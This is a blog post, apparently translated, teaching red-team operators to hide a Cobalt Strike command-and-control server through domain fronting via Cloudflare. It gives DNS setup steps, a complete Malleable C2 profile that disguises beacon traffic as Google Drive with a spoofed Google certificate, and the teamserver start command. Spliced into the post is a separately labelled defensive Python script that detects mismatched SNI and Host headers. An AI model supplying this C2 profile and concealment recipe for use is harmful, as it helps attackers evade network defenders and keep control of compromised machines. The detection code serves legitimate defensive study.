# C2 Hiding: Domain Fronting


C2 Hiding via Domain Fronting (unfinished, to be continued)

## Preface

During a red team engagement, if the C2 server is not protected in some way, then command and control produces network connections from the victim machine to the C2 server. The real IP is then easy to trace back, the C2 server is exposed, and it becomes hard to take any further step.

## Domain Fronting

Domain fronting (also translated as 域名幌子) is a technique for evading Internet censorship by hiding the true endpoint of a connection. Operating at the application layer, it lets a user connect over HTTPS to a blocked service while appearing to communicate with an entirely different site.

Domain fronting is a censorship-evasion technique whose main purpose is to conceal the remote endpoint of a communication. It takes place at the application layer and relies mainly on HTTPS: the remote endpoint would normally be blocked, but with domain fronting the inspector is led to believe it is looking at some other, legitimate address, and the check is bypassed. The core idea is to use different domain names at different layers of the same communication. In one HTTPS request, the outer layer uses one domain name, carried in the DNS query and in the TLS SNI (Server Name Indication); the inner layer uses another domain name, carried in the HTTP Host header. Because the Host header sits under HTTPS encryption, it is invisible to the inspector.
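From the defender's side, this layer split is also the thing to check: a TLS-inspecting proxy or web gateway that logs both the SNI and the HTTP Host header can flag sessions where the two names belong to different domains. The Python below is an added example and not part of the original post; the log line format, the sample entries and the two-label registrable-domain heuristic are all assumptions.

```python
from dataclasses import dataclass
from typing import List

# Constructed sample proxy log: "<tls_sni> <http_host> <client_ip>" per line
# ("-" means no Host header was logged). Not output of any real product.
SAMPLE_LOG = """\
cdn-front.example.net drive.google.com 10.0.0.5
www.front.example.org c2.attacker-placeholder.example 10.0.0.6
mail.google.com mail.google.com 10.0.0.7
CDN.Example.Net cdn.example.net:443 10.0.0.8
static.example.net - 10.0.0.9
"""

@dataclass
class Record:
    sni: str
    host: str
    client_ip: str

def normalize(name: str) -> str:
    """Lower-case, drop a :port and a trailing dot so 'A.B:443' equals 'a.b.'."""
    return name.strip().lower().rsplit(":", 1)[0].rstrip(".")

def registrable(name: str, depth: int = 2) -> str:
    """Assumed eTLD+1 heuristic (last `depth` labels); use the Public Suffix List in production."""
    return ".".join(name.split(".")[-depth:])

def parse_log(text: str) -> List[Record]:
    records = []
    for line in text.splitlines():
        if line.strip():
            sni, host, ip = line.split()
            records.append(Record(sni, host, ip))
    return records

def is_fronting_candidate(rec: Record) -> bool:
    """True when SNI and Host point at different registrable domains."""
    if rec.host == "-":          # no Host header logged: nothing to compare
        return False
    sni, host = normalize(rec.sni), normalize(rec.host)
    if sni == host:
        return False
    # Same-site mismatches (www vs cdn of one domain) are normal CDN behaviour.
    return registrable(sni) != registrable(host)

def find_fronting_candidates(text: str) -> List[Record]:
    """Return the records that deserve an analyst's look."""
    return [r for r in parse_log(text) if is_fronting_candidate(r)]
```

Running it over the constructed log flags only the first two entries; the mixed-case entry with a port and the entry without a Host header are left alone.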

Here I borrow a diagram from another author (image not preserved).

Domain fronting can use high-reputation domains such as Google or Microsoft as the front; here I only do a simple practical run.

## Preparation

  1. A C2 domain
  2. A Cloudflare account
  3. A C2 server

## Domain Configuration

  1. Purchase a domain on GoDaddy and point its NS servers at Cloudflare's nameservers so that Cloudflare handles resolution.

  2. Set the corresponding A record in Cloudflare.

  3. Adjust Cloudflare's caching configuration: turn off development mode and caching.

  4. Configure C2.profile. A collection curated by harmj0y is available here:

     https://github.com/rsmudge/Malleable-C2-Profiles

     The following Google profile serves as a reference.

```
#
# Google Drive
#
# Author: @bluscreenofjeff
#

#set https cert info
https-certificate {
    set CN "*.google.com"; #Common Name
    set O "Google Inc"; #Organization Name
    set C "US"; #Country
    set L "Mountain View"; #Locality
    set ST "California"; #State or Province
    set validity "365"; #Number of days the cert is valid for
}

#default Beacon sleep duration and jitter
set sleeptime "60000";
set jitter "20";

#default useragent for HTTP comms
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";

#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";

#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";

http-get {

set uri "/viewerng/meta";

client {

    header "Accept" "text/html,application/xml;*/*;";
    header "Accept-Encoding" "gzip, deflate";
    header "Host" "drive.google.com";
    header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

    #session metadata
    metadata {
        base64url;
        netbios;
        base64url;
        parameter "id";
    }

    parameter "u" "0";
}

server {
    header "Content-Type" "application/json; charset=utf-8";
    header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
    header "Pragma" "no-cache";
    header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
    header "X-Content-Type-Options" "nosniff";
    header "X-Frame-Options" "SAMEORIGIN";
    header "X-XSS-Protection" "1; mode=block";
    header "Server" "GSE";
    header "Connection" "close";

    #Beacon's tasks
    output {
        print;
    }
}

}

http-post {

set uri "/viewersng/meta";
set verb "GET";

client {

    header "Accept" "text/html,application/xml;*/*;";
    header "Accept-Encoding" "gzip, deflate";
    header "Host" "drive.google.com";
    header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

    output {
        base64url;
        netbios;
        base64url;
        parameter "id";
    }

    #session ID
    id {
        parameter "u";
    }
}

server {
    header "Content-Type" "application/json; charset=utf-8";
    header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
    header "Pragma" "no-cache";
    header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
    header "X-Content-Type-Options" "nosniff";
    header "X-Frame-Options" "SAMEORIGIN";
    header "X-XSS-Protection" "1; mode=block";
    header "Server" "GSE";
    header "Connection" "close";

    output {
        print;
    }
}

}

#change the stager server
http-stager {
    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
    }
}
```

Note that every domain name in the profile file must be replaced with the C2 domain.
![Zms0j2](https://blog-1255850204.cos.ap-guangzhou.myqcloud.com/uPic/Zms0j2.png)


## C2 Configuration

1. Upload the modified C2.profile to the Cobalt Strike root directory and append ./C2.profile to the start command, for example:

```
./teamserver C2ip Password ./C2.profile
```

2. Set up the listener in Cobalt Strike.

## Final Result

Hidden successfully.


Author: 夜莺
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit 夜莺 as the source when reposting!